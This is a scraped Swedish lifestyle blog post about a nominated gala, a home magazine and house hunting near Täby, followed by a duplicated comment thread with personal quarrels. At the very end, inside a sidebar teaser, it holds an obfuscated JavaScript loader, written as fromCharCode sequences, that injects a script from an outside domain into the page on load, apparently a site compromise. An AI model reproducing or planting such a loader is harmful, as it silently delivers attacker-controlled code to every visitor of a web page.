Mys Blommor / Din florist / Interflora 🌹 / Högsta Kvalitet & Design💫 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

Mys Blommor🌹/ Din florist / Högsta Kvalitet & Design💫 / 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

@mymartens

@mys_blommor

Strong Mamas

Rykande färskt Nummer – Allt om villor & hus”

7B2CD6AB-5FF2-4D0A-B6DA-FADB7E1D224A

Godmorgon!

Idag startade jag med ett Lifetyle-möte på mitt favvo café, cafe Saturnus. -HUR gott! 😍

Vi planerar hösten, jobbar inför galan, Lifestyle Award som äger rum i oktober.

 Du kan just nu gå in och rösta på all nominerade och röst på din favorit 😍

Jag själv är nominerad i en kategori… tror att det är 3 eller fjärde året för min del. Tuff konkurans 😅 minst sagt! Mem alltid kul att vara nominerad såklart! Det värmer i hjärtat ❤️ Men nu när jag för första gången jobbat med och inför galan så har jag ju helt glömt bort att jaga röster…. Så nu uppmanar jag er all att gå in och rösta i dom olika kategorierna 🙏🏻

-Rösta gör du HÄR 

Förutom det så har vi jobbat ifatt efter semester. Bla följt  upp vår/sommar OCH börjat planera 2019 respektive 2020. –En härlig kickstart efter semestern helt enkelt! 😉

För någon vecka sedan kom vårat magasin ”Allt om Villor & hus ” ut i butik. Rykande färskt fullt med inspiration! 

 

AE0FA78D-5621-4080-B112-FEF4EA65B61B

Jag och Jonas har ju två bostäder. Torpet på öland som vi hyr. Samt hans lägenhet i Täby. Tanken är att vi ska löpa ett gemensamt boende i Stockholm. Drömmen vore ju ett radhus med någon form av uteplats…..🙏🏻 

Jag blir ju extra sugen när jag läser detta magasin!

I senaste numret hittar du bla en special ”inred uteplatsen till en egen oas” 😍 Mitt florist hjärta saknar en uteplats något enormt!

Såhär skulle jag vilka inreda våran framtida uteplats….

E0207FBA-10CF-4AB4-A845-63F14F7E9E57

Med lite medelhavskänsla, citrusträd, olivträd, murgrönor, prydnadsgräs och lerkrukor & krus🍋🍊🌱 

B360299D-C6A4-4B4F-8F15-95E92DCCE27D

Jag vet att vi kommer dit. Vi stressar inte med någonting. Varken bröllop eller radhus. Men vi kommer nog ändå att prioritera boendet före bröllopet som det känns just nu… och visst är det roligt att stalka hemnet varje dag som jag gör 😇

Vi har hittills varit på två visningar. Jag tycker att det är viktigt att kika på lite olika objekt för att  veta vad vi egentligen vill ha, och i vilket område…. mem som sagt. Ingen stress med någonting….. Och det är en underbar känsla att veta att vi har allt ”det där” framför oss….. 

Grejen är bara dem att Stockholms priserna är brutala om man jämför med tex Kalmar/öland. Där nere för du ett riktigt fint hus med generös trädgård och ca 150 kvadrat, i BRA skick!

 För samma peng får du knappt en 3:a hör uppe 🤣 -Suck! Men det är ju den bistra verkligheten. Vi Hr enats om att vi vill bo ungefär som vi gör. 15min utanför stan med barnvänligt, med natur utanför dörren och vatten runt hörnet 🌱

 kram på dig! 

/My Martens

74 Komentarer

 1. Synd att dina magasin inte finns att se / köpa här.
  Konstigt att du som anställd får vara med och tävla?
  Normalt när det är tävlingar brukar det stå att ”anställda” och deras familjer får ej delta”
  Men kanske är det andra som väljer vilka som ska nomineras och det har du väl kanske inte varit inblandad i.
  Vad härligt förresten att ha ett jobb där man får ha sina möten på caféer och restauranger!
  Jag är inte missunnsam, önskar allt gott, men jag önskar jag hade fått ha det så under min jobbtid.
  På sin höjd fick vi en semla nån gång när chefen slog på stort ?

  • Hej!
   Jag har varit nominerade i flera år tidigare =) Långt innan jag rekryterades till min tjänst så fick jag ett mail om denna nominering… Alltså redan i höstas =) Det är ni, svenska folket som röstar och nominerar =)

   • Oj har du varit nominerad i flera år jag trodde denna gala var något nytt? Men du blev ju nominerad först efter att du blev VD väl, du/ni la ju till och presenterade tre nya kategorier och där var du då med? Hur har svenska folket röstat fram nomineringarna, är det inte ni/Lifestyle som valt? Men kul och lycka till!
    Hoppas du får trevligt på Bigslapfestivalen i Malmö i helgen också som du var så taggad på ?

    • Vi har köpt upp Finest för att lägga ner det. Så denna galan är en uppgradering av den tidigare finest gala kan man säga =) Men med ett uppdaterat upplägg och ett nytt tänk =) Det är till den galan jag varit nominerad i tidigare år… Och nej, jag var nominerad innan min tjänst. Denna galans skulle nämligen varit i höstas redan =) Men blev framskjuten när allt skulle organiseras om. Jag hoppade på tåget och ser nu verkligen fram emot att vara en del i teamet där jag då jobbar me dvalan istället =) Så, för min del så känns det som en vinst för min del =)

  • Jaså du jobbar i vården? På den tiden jag jobbade i vården fick vi en halv fralla, observera en halv haha o en kopp kaffe till jul. Men sen ändrades det minsann omkring år 2000. Då fick vi julbord. Saken var bara att det var så oorganiserat så flera hundra personer fick stå o kö varpå mycket var slut när man väl kom fram.
   Året efter avböjde jag att gå på nåt jäkla julbord med de stimmet. Kommunen skämdes faktiskt så ytterligare året därpå fick vi gå på en stadens finaste restaurang och äta ett julbord jag aldrig skådat. Saken var bara att kommunen blev så fattiga efter detta så vi fick jobba röven av oss och blev inbeodrade hela tiden. Visst, det är dyrt att inbeodra men dom kollade vilka som låg minus på sitt jobbsaldo i timmar så det blev ändå inga extra pengar där inte.
   Ja, så jobbar kommunen inom vård o omsorg. Inte konstigt alls att jag sa upp mig 2014. Inte ångrat en sekund!! Bara lite snick snack hur de kan vara på olika arbetsplatser.

  • Hon har lagt dit sig själv?? de andra namnen har de valt ut för att de hoppas och önskar att de ska bli så smickrande så de kommer på deras Event sen.
   As if Bianca skulle lägga någon möda på ett företag med under 10 000 i årlig omsättning. ?

   • ?????? 11 Magasin, ett mediabolag och en branscherfarenhet och samma bolag i 30 år. Mycket märklig kommentar… Något dålig research från din sida kan jag tycka. Och nej, jag har ingenting med nomineringen att göra? Ha en fin dag =)

   • Tror inte heller att de här storbloggarna / influenserna lägger ner så mycket tid på att fiska röster till den här utmärkelsen, inte för att jag läser alla men har inte sett något hos de jag följer med lite i.

 2. Synd att dina magasin inte finns att se / köpa här.
  Konstigt att du som anställd får vara med och tävla😉
  Normalt när det är tävlingar brukar det stå att ”anställda” och deras familjer får ej delta”
  Men kanske är det andra som väljer vilka som ska nomineras och det har du väl kanske inte varit inblandad i.
  Vad härligt förresten att ha ett jobb där man får ha sina möten på caféer och restauranger!
  Jag är inte missunnsam, önskar allt gott, men jag önskar jag hade fått ha det så under min jobbtid.
  På sin höjd fick vi en semla nån gång när chefen slog på stort 😂

  • Hej!

   Jag har varit nominerade i flera år tidigare =) Långt innan jag rekryterades till min tjänst så fick jag ett mail om denna nominering… Alltså redan i höstas =) Det är ni, svenska folket som röstar och nominerar =)

   • Oj har du varit nominerad i flera år jag trodde denna gala var något nytt? Men du blev ju nominerad först efter att du blev VD väl, du/ni la ju till och presenterade tre nya kategorier och där var du då med? Hur har svenska folket röstat fram nomineringarna, är det inte ni/Lifestyle som valt? Men kul och lycka till!

    Hoppas du får trevligt på Bigslapfestivalen i Malmö i helgen också som du var så taggad på 😉

    • Vi har köpt upp Finest för att lägga ner det. Så denna galan är en uppgradering av den tidigare finest gala kan man säga =) Men med ett uppdaterat upplägg och ett nytt tänk =) Det är till den galan jag varit nominerad i tidigare år… Och nej, jag var nominerad innan min tjänst. Denna galans skulle nämligen varit i höstas redan =) Men blev framskjuten när allt skulle organiseras om. Jag hoppade på tåget och ser nu verkligen fram emot att vara en del i teamet där jag då jobbar me dvalan istället =) Så, för min del så känns det som en vinst för min del =)

  • Jaså du jobbar i vården? På den tiden jag jobbade i vården fick vi en halv fralla, observera en halv haha o en kopp kaffe till jul. Men sen ändrades det minsann omkring år 2000. Då fick vi julbord. Saken var bara att det var så oorganiserat så flera hundra personer fick stå o kö varpå mycket var slut när man väl kom fram.

   Året efter avböjde jag att gå på nåt jäkla julbord med de stimmet. Kommunen skämdes faktiskt så ytterligare året därpå fick vi gå på en stadens finaste restaurang och äta ett julbord jag aldrig skådat. Saken var bara att kommunen blev så fattiga efter detta så vi fick jobba röven av oss och blev inbeodrade hela tiden. Visst, det är dyrt att inbeodra men dom kollade vilka som låg minus på sitt jobbsaldo i timmar så det blev ändå inga extra pengar där inte.

   Ja, så jobbar kommunen inom vård o omsorg. Inte konstigt alls att jag sa upp mig 2014. Inte ångrat en sekund!! Bara lite snick snack hur de kan vara på olika arbetsplatser.

  • Hon har lagt dit sig själv😂😂 de andra namnen har de valt ut för att de hoppas och önskar att de ska bli så smickrande så de kommer på deras Event sen.
   As if Bianca skulle lägga någon möda på ett företag med under 10 000 i årlig omsättning. 😂

   • ?????? 11 Magasin, ett mediabolag och en branscherfarenhet och samma bolag i 30 år. Mycket märklig kommentar… Något dålig research från din sida kan jag tycka. Och nej, jag har ingenting med nomineringen att göra😂 Ha en fin dag =)

   • Tror inte heller att de här storbloggarna / influenserna lägger ner så mycket tid på att fiska röster till den här utmärkelsen, inte för att jag läser alla men har inte sett något hos de jag följer med lite i.

 3. Hej, hur många anställda är ni på lifestyle, hur många Vd är ni? Vad är du Vd för? Hur många har du under dig. Berätta gärna, spännande att få ta del av tycker jag. Har aldrig hört talas om dessa tidningar.

  • Sätter min årslön på att hon inte kommer att svara konkret på dina frågor !! Hon är ett skämt. Därav aldrig svar på kommmentarer liknande denna. Hon jar NOLL KOLL!!

   • Ja ni ser… inget svar! Förvånade? NÄ!
    Ställar samma fråga igen som Ann:
    Hej, hur många anställda är ni på lifestyle, hur många Vd är ni? Vad är du Vd för? Hur många har du under dig. Berätta gärna, spännande att få ta del av tycker jag. Har aldrig hört talas om dessa tidningar.

  • Hej Ann! Genom åren så vet jag att du alltid är extremt nyfiken av dig… Totalt är vi ca 20 personen i organisationen, redaktion, säljare, journalister. Sen har vi externa partner så som fotografer, mediapartner, välgörenhet och våra delägare såklart =)

   • Du har svårt att hålla dig till ämnet och kommer ALDRIG med nkonkret svar.
    SÅ, vi förtydlar: Som du som VD ska kunna svara på somm rinnande vatten:
    FRÅGA_
    1:Hej, hur många anställda är ni på lifestyle,
    2:hur många Vd är ni?
    3: Vad är du Vd för?
    4:Hur många ”anställda” har dy under dig?
    Skippa dina vanliga spydiga o onödiga kommentarer om troll o nyfikenhet o bla bla bla.
    svara bara pp fråga 1-4

    • ???
     Jag svarar på det jag vill svara på. Det jag anser att jag kan dela med mig av Att sitte och dela ut våra olika företags-organisation, avtal, anställningsformer osv är ingenting som varken du eller min bloggläsare har med att göra! ?
     Jag har berättat lite kring redaktionen, magasinen, säljarna, journalisterna och förklarat att vi är mellan 15-20 personer. That’s it! Jag har ingen redovisningsskyldighet mellan företagen och offentligheten. Det är ju bland det dummaste jag läst?
     Ditt ständiga iakttagande och dina frågor kring allt jag jobbar med käns lite olustigt. Du känns näsyN lite besatt av mig ? att du dessutom blir så provocerad av att jag inte svarar gällande interna uppgifter är läskigt… -Står det rätt till med dig?

     • Hahaha. Som jag antog!
      Såklart var du tvungen att tillaga samma sak om o om o om igen.
      Jag är allt annat än besatt. Av dig.
      Det är dina svar här i kommentarerna som roar. Och så typiskt för mytomaner att alltid lägga till för att känna och tro att dom får sista ordet.
      Även Du måste ju vid det här laget fatta att det ör DINA ’svar’ och upprepningar här som roar oss.
      Attack, påpekanden påhopp att du minsann Tror dig VETA allt om alla som du ideligen ALLTID måste tillägga. I VART ENDA INLÄGG SOM INTE innehåller hjärtan o heja rop.
      Du ä för tragisk! Men tack för dina korkade svar i kommentarerna.

     • Varför skriva så sarkastiskt och nedlåtande? Och med dessa i varje mästrande svar: ?
      Jo jag vet att du kollar IP-adresser, räknar inlägg och ser vem som trollar. Jag är ändå säker på att nivån i kommentarsfältet och stämningen här inne sätts av dig! Är du trevlig, saklig och inte använder dig av härskartekniker så föregår du med gott exempel. Det är lättare att ribban sänks när din egna kommentarer håller så låg nivå.
      Något du ens reflekterat över?
      Och ja, jag har läst flera gånger att du testat alla varianter men att det inte blir bättre.
      Under de år som jag följt bloggen så har du i alla fall inte låtit bli att kommentera väldigt ohövligt.
      Det går endast att förändra sig och inte andra. Det börjar och slutar med dig My.

    • Öööhhh, till VM: Du vet väl att ett bolag bara kan ha EN VD och eventuellt EN VVD? Korkad fråga! Av vilken anledning kräver du dessa svar av My? Fråga ledningen istället vettja ?? En VD svarar bara för de löpande förvaltningsårgärderna, så de ytterst nyfikna frågorna bör ställas högre upp ? (varför de nu är så intressanta….)

 4. Är inte dina foton med på Tigelles hemsida eller är bilderna ni har tagit för nästa säsong? ser att det är en annan modell som visar den där gröna baddräkten du lade upp i ett tidigare inlägg.

  • Hej! Ingen av fotona från våran plåtning finns med på hemsidan =) Vi plåtade både sådant som redan finns och nästa kollektion som är påväg ut =) Den gröna är min egen baddräkt som jag även har privat =)

    • En kamapanj för tigelle. Både digital och i magasin. Ett badmode helt enskelt ☺️ Vart bilderna hamnar är lite olika…. webb, native, instagram, Facebook, sponsrade inlägg, nyhetsbrev, kampanjer och slutligen i två eller tre magasin tror jag ☺️

 5. Hej, hur många anställda är ni på lifestyle, hur många Vd är ni? Vad är du Vd för? Hur många har du under dig. Berätta gärna, spännande att få ta del av tycker jag. Har aldrig hört talas om dessa tidningar.

  • Sätter min årslön på att hon inte kommer att svara konkret på dina frågor !! Hon är ett skämt. Därav aldrig svar på kommmentarer liknande denna. Hon jar NOLL KOLL!!

   • Ja ni ser… inget svar! Förvånade? NÄ!
    Ställar samma fråga igen som Ann:

    Hej, hur många anställda är ni på lifestyle, hur många Vd är ni? Vad är du Vd för? Hur många har du under dig. Berätta gärna, spännande att få ta del av tycker jag. Har aldrig hört talas om dessa tidningar.

  • Hej Ann! Genom åren så vet jag att du alltid är extremt nyfiken av dig… Totalt är vi ca 20 personen i organisationen, redaktion, säljare, journalister. Sen har vi externa partner så som fotografer, mediapartner, välgörenhet och våra delägare såklart =)

   • Du har svårt att hålla dig till ämnet och kommer ALDRIG med nkonkret svar.
    SÅ, vi förtydlar: Som du som VD ska kunna svara på somm rinnande vatten:

    FRÅGA_
    1:Hej, hur många anställda är ni på lifestyle,
    2:hur många Vd är ni?
    3: Vad är du Vd för?
    4:Hur många ”anställda” har dy under dig?

    Skippa dina vanliga spydiga o onödiga kommentarer om troll o nyfikenhet o bla bla bla.

    svara bara pp fråga 1-4

    • 😂😂😂

     Jag svarar på det jag vill svara på. Det jag anser att jag kan dela med mig av Att sitte och dela ut våra olika företags-organisation, avtal, anställningsformer osv är ingenting som varken du eller min bloggläsare har med att göra! 😂

     Jag har berättat lite kring redaktionen, magasinen, säljarna, journalisterna och förklarat att vi är mellan 15-20 personer. That’s it! Jag har ingen redovisningsskyldighet mellan företagen och offentligheten. Det är ju bland det dummaste jag läst😂

     Ditt ständiga iakttagande och dina frågor kring allt jag jobbar med käns lite olustigt. Du känns näsyN lite besatt av mig 😬 att du dessutom blir så provocerad av att jag inte svarar gällande interna uppgifter är läskigt… -Står det rätt till med dig?

     • Hahaha. Som jag antog!
      Såklart var du tvungen att tillaga samma sak om o om o om igen.

      Jag är allt annat än besatt. Av dig.
      Det är dina svar här i kommentarerna som roar. Och så typiskt för mytomaner att alltid lägga till för att känna och tro att dom får sista ordet.

      Även Du måste ju vid det här laget fatta att det ör DINA ’svar’ och upprepningar här som roar oss.

      Attack, påpekanden påhopp att du minsann Tror dig VETA allt om alla som du ideligen ALLTID måste tillägga. I VART ENDA INLÄGG SOM INTE innehåller hjärtan o heja rop.

      Du ä för tragisk! Men tack för dina korkade svar i kommentarerna.

     • Varför skriva så sarkastiskt och nedlåtande? Och med dessa i varje mästrande svar: 😂

      Jo jag vet att du kollar IP-adresser, räknar inlägg och ser vem som trollar. Jag är ändå säker på att nivån i kommentarsfältet och stämningen här inne sätts av dig! Är du trevlig, saklig och inte använder dig av härskartekniker så föregår du med gott exempel. Det är lättare att ribban sänks när din egna kommentarer håller så låg nivå.
      Något du ens reflekterat över?

      Och ja, jag har läst flera gånger att du testat alla varianter men att det inte blir bättre.

      Under de år som jag följt bloggen så har du i alla fall inte låtit bli att kommentera väldigt ohövligt.
      Det går endast att förändra sig och inte andra. Det börjar och slutar med dig My.

    • Öööhhh, till VM: Du vet väl att ett bolag bara kan ha EN VD och eventuellt EN VVD? Korkad fråga! Av vilken anledning kräver du dessa svar av My? Fråga ledningen istället vettja 👍🏻 En VD svarar bara för de löpande förvaltningsårgärderna, så de ytterst nyfikna frågorna bör ställas högre upp 😉 (varför de nu är så intressanta….)

 6. Är inte dina foton med på Tigelles hemsida eller är bilderna ni har tagit för nästa säsong? ser att det är en annan modell som visar den där gröna baddräkten du lade upp i ett tidigare inlägg.

  • Hej! Ingen av fotona från våran plåtning finns med på hemsidan =) Vi plåtade både sådant som redan finns och nästa kollektion som är påväg ut =) Den gröna är min egen baddräkt som jag även har privat =)

    • En kamapanj för tigelle. Både digital och i magasin. Ett badmode helt enskelt ☺️ Vart bilderna hamnar är lite olika…. webb, native, instagram, Facebook, sponsrade inlägg, nyhetsbrev, kampanjer och slutligen i två eller tre magasin tror jag ☺️

  • Jag komme inte vinna. jag har inte engagerat mig i att åta folk rösta, plus att konkurrensen är på tok för hård =) Detta är en gala som jag kommer jobba med istället =) men tackar ändå för nomineringen…. Såklart =)

  • Jag komme inte vinna. jag har inte engagerat mig i att åta folk rösta, plus att konkurrensen är på tok för hård =) Detta är en gala som jag kommer jobba med istället =) men tackar ändå för nomineringen…. Såklart =)

 7. Håll ögonen öppna för radhus i skarpäng och kopparvägen. Fantastiskt område med mörtsjön, fjäturen och rösjön med gångavstånd. Grönområden. Bra skolor.
  Lycka till!
  Gisse

 8. Håll ögonen öppna för radhus i skarpäng och kopparvägen. Fantastiskt område med mörtsjön, fjäturen och rösjön med gångavstånd. Grönområden. Bra skolor.
  Lycka till!
  Gisse

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/